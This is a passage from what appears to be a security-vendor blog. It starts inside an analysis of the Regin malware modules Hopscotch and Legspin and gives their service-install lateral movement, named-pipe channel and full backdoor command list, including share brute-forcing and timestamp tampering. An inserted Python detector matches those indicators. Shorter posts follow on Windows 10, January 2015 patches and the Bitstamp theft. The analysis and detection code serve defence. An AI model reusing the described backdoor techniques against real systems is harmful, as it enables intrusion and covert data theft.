The module receives the name of the target machine and an optional remote file name from the standard input (operator). The attackers can choose from several options at the time of execution and the tool provides human-readable responses and suggestions for possible input.

Here's an example of "Hopscotch" running inside a virtual machine:

    Authentication Mechanism (SU or NETUSE) [S]/N:
    Continue? [n]:
    A File of the same name was already present on Remote Machine - Not deleting...

The module can use two routines to authenticate to the target machine: either connecting to the standard share named "IPC$" (the method called "NET USE") or logging on as a local user ("SU", or "switch user") who has enough rights to proceed with further actions.

It then extracts a payload executable from its resources and writes it to a location on the target machine. The default location for the payload is: \\%target%\ADMIN$\SYSTEM32\SVCSTAT.EXE. Once successful, it connects to the remote machine's service manager and creates a new service called "Service Control Manager" to launch the payload. The service is immediately started and then stopped and deleted after one second of execution.

The module establishes a two-way encrypted communication channel with the remote payload SVCSTAT.EXE using two named pipes. One pipe is used to forward input from the operator to the payload and the other writes data from the payload to the standard output. Data is encrypted using the RC4 algorithm and the initial key exchange is protected using asymmetric encryption.

\\%target%\pipe\{66fbe87a-4372-1f51-101d-1aaf0043127a}
\\%target%\pipe\{44fdg23a-1522-6f9e-d05d-1aaf0176138a}

Once completed, the tool deletes the remote file and closes the authenticated sessions, effectively removing all the traces of the operation.

The SVCSTAT.EXE payload module launches its copy in the process dllhost.exe and then prepares the corresponding named pipes on the target machine and waits for incoming data. Once the original module connects to the pipe, it sets up the encryption of the pipe communication and waits for the incoming shellcode.

The executable is injected in a new process of dllhost.exe or svchost.exe and executed, with its input and output handles redirected to the remote plugin that initiated the attack. This allows the operator to control the injected module and interact with it.

The Legspin module

MD5: 29105f46e4d33f66fee346cfd099d1cc
Size: 67584 bytes
Type: Win32 EXE
Compiled: 2003.03.17 08:33:50 (GMT)

This module was also developed as a standalone command line utility for computer administration. When run remotely it becomes a powerful backdoor. It is worth noting that the program has full console support and features colored output when run locally. It can even distinguish between consoles that support Windows Console API and TTY-compatible terminals that accept escape codes for coloring.

"Legspin" output in a standard console window with color highlighting

In addition to the compilation timestamp found in the PE headers, there are two references that point to 2003 as its true year of compilation. The program prints out two version labels:

  • 2002-09-A, referenced as "lib version"
  • 2003-03-A

In addition, the program uses legacy API functions, such as the "NetBIOS" API, which was introduced in Windows 2000 and deprecated in Windows Vista.

Once started and initialized, it provides the operator with an interactive command prompt, waiting for incoming commands. The list of available commands is pretty large and allows the operators to perform many administrative actions. Some of the commands require additional information that is requested from the operator, and the commands provide a text description of the available parameters. The program is actually an administrative shell that is intended to be operated manually by the attacker/user.

Command - Description

cd - Change current working directory
dir, ls, dirl, dirs - List files and directories
tar - Find files matching a given mask and time range, and write their contents to a XOR-encrypted archive
tree - Print out a directory tree using pseudographics
trash - Read and print out the contents of the Windows "Recycle Bin" directory
get - Retrieve an arbitrary file from the target machine, LZO compressed
put - Upload an arbitrary file to the target machine, LZO compressed
del - Delete a file
ren, mv, copy, cp - Copy or move a file to a new location
gtm - Get file creation, access, write timestamps and remember the values
stm - Set file creation, access, write timestamps to the previously retrieved values
mtm - Modify the previously retrieved file timestamps
scan, strings - Find and print out all readable strings from a given file
more - Print out the contents of an arbitrary file
access - Retrieve and print out DACL entries of files or directories
audit - Retrieve and print out SACL entries of files or directories
finfo - Retrieve and print out version information from a given file
cs - Dump the first 10,000 bytes from an arbitrary file or from several system files:
  • advapi32.dll
  • kernel32.dll
  • msvcrt.dll
  • ntdll.dll
  • ntoskrnl.exe
  • win32k.sys
  • cmd.exe
  • ping.exe
  • ipconfig.exe
  • tracert.exe
  • netstat.exe
  • net.exe
  • user32.dll
  • gdi32.dll
  • shell32.dll
lnk - Search for LNK files, parse and print their contents
info - Print out general system information:
  • CPU type
  • memory status
  • computer name
  • Windows and Internet Explorer version numbers
  • Windows installation path
  • Codepage
dl - Print information about the disks:
  • Type
  • Free/used space
  • List of partitions, their filesystem types
ps - List all running processes
logdump - Unfinished, only displays the parameter description
reglist - Dump registry information for a local or remote hive
windows - Enumerate all available desktops and all open windows
view - List all visible servers in a domain
domains - List the domain controllers in the network
shares - List all visible network shares
regs - Print additional system information from the registry:
  • IE version
  • Outlook Express version
  • Logon default user name
  • System installation date
  • BIOS date
  • CPU frequency
  • System root directory
ips - List network adapter information:
  • DHCP/static IP address
  • Default gateway's address
times - Obtain the current time from a local or remote machine
who - List the names of current users and the domains accessed by the machine
net, nbtstat, tracert, ipconfig, netstat, ping - Run the corresponding system utility and print the results
tel - Connect to a given TCP port of a host, send a string provided by the operator, print out the response
dns, arps - Resolve a host using DNS or ARP requests
users - List information about all user accounts
admins - List information about user accounts with administrative privileges
groups - List information about user groups
trusts - List information about interdomain trust user accounts
packages - Print the names of installed software packages
sharepw - Run a brute-force login attack trying to obtain the password of a remote share
sharelist - Connect to a remote share
srvinfo - Retrieve current configuration information for the specified server
netuse - Connect, disconnect or list network shares
netshare - Create or remove network shares on the current machine
nbstat - List NetBIOS LAN adapter information
run - Create a process and redirect its output to the operator
system - Run an arbitrary command using WinExec API
exit - Exit the program
set - Set various internal variables used in other shell commands
su - Log on as a different user
kill - Terminate a process by its PID
kpinst - Modify the registry value [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] System. This value should normally point to "lsass.exe".
svc, drv - Create, modify or remove a system service
help, ? - Print the list of supported commands

The Legspin module we recovered doesn't have a built-in C&C mechanism. Instead, it relies on the Regin platform to redirect the console input/output to/from the operators.
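The Hopscotch sequence above (a service named "Service Control Manager" installed to run SVCSTAT.EXE, started and stopped within about a second, plus two GUID-named pipes) and Legspin's kpinst rewrite of the Winlogon "System" value are all visible in ordinary host telemetry. The following detection logic is an added example, not Kaspersky's code: it runs over constructed, simplified event records modelled on Windows System log events 7045/7036 and Sysmon events 13/17/18, and the two-second lifetime threshold is an assumption derived from the text.

```python
from datetime import datetime

# Indicators quoted in the analysis above (service name, payload, pipe names,
# and the Winlogon value that Legspin's kpinst command rewrites)
HOPSCOTCH_SERVICE, HOPSCOTCH_PAYLOAD = "service control manager", "svcstat.exe"
HOPSCOTCH_PIPES = {"{66fbe87a-4372-1f51-101d-1aaf0043127a}",
                   "{44fdg23a-1522-6f9e-d05d-1aaf0176138a}"}
WINLOGON_SYSTEM = r"hklm\software\microsoft\windows nt\currentversion\winlogon\system"
SHORT_LIVED_SECONDS = 2.0  # assumption: the text says the service is stopped after ~1 s

def detect_service_install(events):
    # System 7045-style record: Hopscotch's service name or an SVCSTAT.EXE image path
    hits = []
    for ev in (e for e in events if e.get("id") == 7045):
        image = ev.get("image", "").lower().rsplit("\\", 1)[-1]
        if ev.get("service", "").lower() == HOPSCOTCH_SERVICE or image == HOPSCOTCH_PAYLOAD:
            hits.append(f"{ev['ts']} service install '{ev['service']}' -> {ev['image']}")
    return hits

def detect_short_lived_service(events):
    # System 7036: 'running' then 'stopped' for the same service within seconds (start/stop/delete pattern)
    started, hits = {}, []
    for ev in sorted((e for e in events if e.get("id") == 7036), key=lambda e: e["ts"]):
        svc = ev["service"]
        if ev["state"] == "running":
            started[svc] = datetime.fromisoformat(ev["ts"])
        elif ev["state"] == "stopped" and svc in started:
            life = (datetime.fromisoformat(ev["ts"]) - started.pop(svc)).total_seconds()
            if life <= SHORT_LIVED_SECONDS:
                hits.append(f"{ev['ts']} service '{svc}' ran for only {life:.1f}s")
    return hits

def detect_hopscotch_pipes(events):
    # Sysmon pipe events (17 created, 18 connected): match the GUID-named pipes
    hits = []
    for ev in (e for e in events if e.get("id") in (17, 18)):
        if ev.get("pipe", "").lower().rsplit("\\", 1)[-1] in HOPSCOTCH_PIPES:
            hits.append(f"{ev['ts']} Hopscotch pipe {ev['pipe']} (event {ev['id']})")
    return hits

def detect_winlogon_system(events):
    # Sysmon 13 (registry value set): Winlogon\System should point to lsass.exe
    hits = []
    for ev in (e for e in events if e.get("id") == 13
               and e.get("target", "").lower() == WINLOGON_SYSTEM):
        if ev.get("details", "").lower().rsplit("\\", 1)[-1] != "lsass.exe":
            hits.append(f"{ev['ts']} Winlogon\\System rewritten to '{ev['details']}'")
    return hits

def run_all(events):
    return (detect_service_install(events) + detect_short_lived_service(events)
            + detect_hopscotch_pipes(events) + detect_winlogon_system(events))

# Constructed sample events (not real telemetry); ISO timestamps sort lexically
SAMPLE_EVENTS = [
    {"ts": "2015-01-20T10:00:00", "id": 7045, "service": "Service Control Manager",
     "image": r"C:\Windows\system32\SVCSTAT.EXE"},
    {"ts": "2015-01-20T10:00:00", "id": 7036, "service": "Service Control Manager", "state": "running"},
    {"ts": "2015-01-20T10:00:01", "id": 7036, "service": "Service Control Manager", "state": "stopped"},
    {"ts": "2015-01-20T10:00:01", "id": 17, "pipe": r"\{66fbe87a-4372-1f51-101d-1aaf0043127a}"},
    {"ts": "2015-01-20T10:03:00", "id": 13, "details": r"C:\Windows\Temp\notlsass.exe",
     "target": r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\System"},
    {"ts": "2015-01-20T09:00:00", "id": 7036, "service": "Spooler", "state": "running"},  # benign
    {"ts": "2015-01-20T09:10:00", "id": 7036, "service": "Spooler", "state": "stopped"},
]
```

Against SAMPLE_EVENTS, run_all returns one alert from each detector and nothing for the ten-minute Spooler lifetime.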

Conclusions

Unlike most other Regin modules, Legspin and Hopscotch appear to be stand-alone tools developed much earlier. The Legspin backdoor in particular dates back to 2003 and perhaps even 2002. It's worth pointing out that not all Regin deployments contain the Legspin module; in most cases, the attackers manage their victims through other Regin platform functions.

This means that Legspin could have been used independently from the Regin platform, as a simple backdoor together with an input/output wrapper.

Although more details about Regin are becoming available, there is still a lot that remains unknown. One thing is already clear – what we know about Regin is probably already retired information that has been replaced by new modules and techniques as time passes.

Windows 10 Preview and Security

Wed, 01/21/2015 - 15:25

Microsoft presented a preview of their newest "experience", Windows 10, over a live stream this morning. The release is expected later this year. This isn't envisioned as just an OS for desktops, but is pitched as a truly broad computing platform. They claim to have built Windows 10 with "more personal computing" in mind, and it's an ambitious push into seamlessly bringing together desktop computing, holographic computing (awesome!!!), mobile devices, gaming and IoT, a move to the "Store", productivity applications, big data services and sharing, new hardware partner technologies, and cloud computing for a "mobility of experience". They skimmed over "Trust" only in light of data privacy issues. From what I have seen, pushing aside security is a somewhat disappointing theme for all of the vendors at their previews, not just Microsoft. There is, however, a very long list of enhanced security features developed into this new codebase, along with a massive amount of new attack surface introduced with this new platform.

Microsoft is attempting to tighten down the new version of Windows by disallowing untrusted applications from installing and by verifying applications' trustworthiness through their digital signatures. This trusted signing model is an improvement; however, this active handling is not perfect. APT attacks like Winnti's on major development shops, and their multiple other significant ongoing attack projects, demonstrate that digital certificates are readily stolen and re-used in attacks. The certificates are not used only in the core group's Winnti attacks: they are distributed throughout multiple APT actors, who share these highly valued assets, breaking the trust model itself to further their espionage efforts.

With seamless integration of all these data sharing services across computing resources, authentication and its underlying credentials and tokens must not be leaked across services, applications, and devices. Pass-the-hash attack techniques, frequently used by targeted attackers, have haunted corporate organizations using Windows for almost a decade. These types of credential theft techniques will have to be better protected against. And Flame introduced a whole new level of credential attack, so we may see Hyper-V and the newest container model for Windows 10 attacked to gain access to and abuse these tokens for lateral movement and data access. Defensive efforts haven't been terribly successful in their responsiveness in the past, and Active Directory continues to see new attacks on organization-wide authentication with "skeleton keys". So, their implementation of credential provisioning and access token handling will deserve security researchers' attention - the attack surface of Hyper-V technologies and components will come under a new focus for years to come. The DLP implementation for sharing corporate data securely is encouraging as well, but how strong can it be across energy constrained mobile hardware?

Considering that 2014 brought with it over 200 patch-worthy vulnerabilities for the various versions of Internet Explorer, a minimalist refresh of this code with the "Project Spartan" browser would be welcome. Simply put, the IE web browser was hammered in 2014 across all Windows platforms, including their latest. Our AEP and other technologies have been protecting against exploitation of these vulnerabilities in high volume this past year. Not only has its model implementing ActiveX components and its design been under heavy review, but the slew of newer code and functionality enabling "use-after-free" vulnerabilities led to critical remote code execution. The new Spartan browser brings with it large amounts of new code for communications and data sharing, which brings with it Microsoft's track record of introducing hundreds of patch-worthy vulnerabilities annually into their browser code. Hopefully their team won't bring that baggage with them, but the load seems pretty heavy with the new functionality. I didn't see any new security features, development practices, or sandboxes described for it and will wait to see what is in store here.

An unusually large amount of time was set aside to present their "intelligent assistant" Cortana, which started with a somewhat disconnected and bizarre conversation between the presenter and the actual Cortana assistant instance onstage. The devil is in the details when implementing security support for access to data across fairly unpredictable services like this one.

Of course, our products will be ready to go. Kaspersky Lab consumer products will support Windows 10 after its official launch. There will be no need for customers to reinstall Kaspersky Lab solutions for migration onto the new platform. All these products will be patched accordingly and will provide the same exceptional level of protection on the new Windows OS.

Microsoft Security Updates January 2015

Wed, 01/14/2015 - 20:34

Microsoft's security team begins 2015 with a minimal set of Security Bulletins, MS15-001 through MS15-008. The set includes one critical vulnerability in a service that probably shouldn't be shipped any longer (telnet), and seven bulletins rated "Important" that patch elevation of privilege, DoS, and security bypass issues.

The critical Bulletin affects the telnet service. The telnet service is an ancient piece of software that provides shell access to a system, mostly available on router installations. But it runs over unencrypted, plain text communications, and should not be used. It was also a bit of a bear to configure and make useful, but may have been useful in development and IT environments. Luckily, this service is not enabled by default on supported Windows systems (but it is installed by default on Windows Server 2003). A quick search in Shodan shows a pretty reduced set of users, and its presence in our KSN data is very limited. And, on the public internet, the number of Windows telnet servers listening on port 23 and providing a related banner is only a couple hundred. So, this patch affects very few customers.

But, if someone didn't install an alternative like OpenSSH, doesn't use the PowerShell facility, WinSCP, RDP, or other facilities, and oddly installed this service, they may be running a server vulnerable to remote malformed packet delivery leading to remote code execution. Meaning it's a severe issue that really "shouldn't" affect many users. And it appears not to be exploited on our user base. When installed and enabled, Microsoft's telnet server runs as "Tlntsess.exe" on all Windows systems since Windows Server 2003. And on a somewhat related note, KSN shows infected Tlntsess.exe files on new customer systems running a first scan or enabling a scan after running infected code:
Virus.Win32.Virut.ce
Worm.Win32.Mabezat.b
Virus.Win32.Sality.gen
Virus.Win32.Parite.b
Virus.Win32.Nimnul.a
Virus.Win32.Tenga.a
Virus.Win32.Expiro.w
Virus.Win32.Slugin.a

It's always surprising to still see the viral stuff, but it's certainly more prevalent than telnet service exploitation at this point.

The other Security Bulletins are rated "Important", and the escalation of privilege issues are somewhat interesting and the kind of thing businesses should be aware of - they are frequently used as a part of targeted attack activity.

One of these EoP vulnerabilities was reported privately and exposed publicly by Google's Project Zero two days prior to the scheduled and known patch release. The project maintains a database of exploitable vulnerabilities, each of which has a deadline of 90 days from reporting before the bug goes public: "Deadline exceeded - automatically derestricting". This EoP was fixed and the fix released by Microsoft as MS15-003 on its scheduled "Patch Tuesday" release, two days after Google exposed their bug issue publicly. It's strange that Google would do such a thing; it's not as if Microsoft doesn't commit to reasonable time frames for fixes and proper testing anymore. Microsoft responded with a lengthy writeup on responsible disclosure and cooperation within the industry, and mentioned Google's approach in particular.

The flawed code has yet to be seen as abused in the wild, but it will likely happen. You can find a set of executive summaries for the Bulletins here.

And one last note: the Advanced Notification Service is coming to an end. Microsoft ended their practice of broadcasting advance notice of security updates to all customers, and offers it only to paying Premier-level customers. For the most part, it seems that this works out just fine and possibly frustrates people less with security maintenance. However, I think that it would be useful for Microsoft to pre-release forecasted download file sizes and reboot requirements for the updates, along with their ratings of critical or not, etc. For example, knowing that I will have to download over 200 MB of critical software updates requiring system reboots would be helpful. That information would be useful to their customers both large and small. Time will tell if they bring it back, but likely, they will not need to.

Bitcoin value plunges following $5M Bitstamp Heist

Thu, 01/08/2015 - 11:02

The new year has started rather badly for the Bitcoin world. On January 4th, a cyber-attack against Bitstamp, one of the biggest bitcoin exchanges in the world, resulted in the loss of almost 19,000 BTC - the equivalent of more than $5 million.

While very little is known at the moment about how the attackers managed to pull off this latest bitcoin heist, Bitstamp is assuring their customers that all of their bitcoins remain safe. The company states that "this breach represents a small fraction of Bitstamp's total bitcoin reserves", so hopefully covering the losses shouldn't be a problem for them.

Because of the irreversible nature of bitcoin transactions, the only thing Bitcoin enthusiasts can do right now is to sit and watch how the attackers are emptying the address used to collect the stolen bitcoins.

You can follow the thieves' transactions by yourself here: https://blockchain.info/address/1L2JsXHPMYuAa9ugvHGLwkdstCPUDemNCf

Right now, the attackers are most likely trying to move those bitcoins around through as many addresses as possible, and then will proceed to launder the stolen coins by using so-called "mixing" services.

Bitstamp seems to have been much better prepared for such an incident compared to Mt. Gox, so while the price of Bitcoin was of course impacted, the impact was not that big. Part of the reason is that bitcoins are currently trading at prices that haven't been seen since the autumn of 2013 anyway, between $250 and $300 for 1 BTC.


Bitcoin price in 2014 - source: ZeroBlock

Taking into account these cyber attacks, we conclude that in 2015 security will remain the most important thing for Bitcoin exchanges and enthusiasts.

Our advice is to diversify and try and minimize the time in which your bitcoins are hosted by anyone else except yourself. Bitcoin exchanges and third party wallet providers seem to act as a magnet for attackers, so it's better to take the security of your bitcoins in your own hands.

Make sure to check out our tips on How to Keep Your Bitcoins Safe.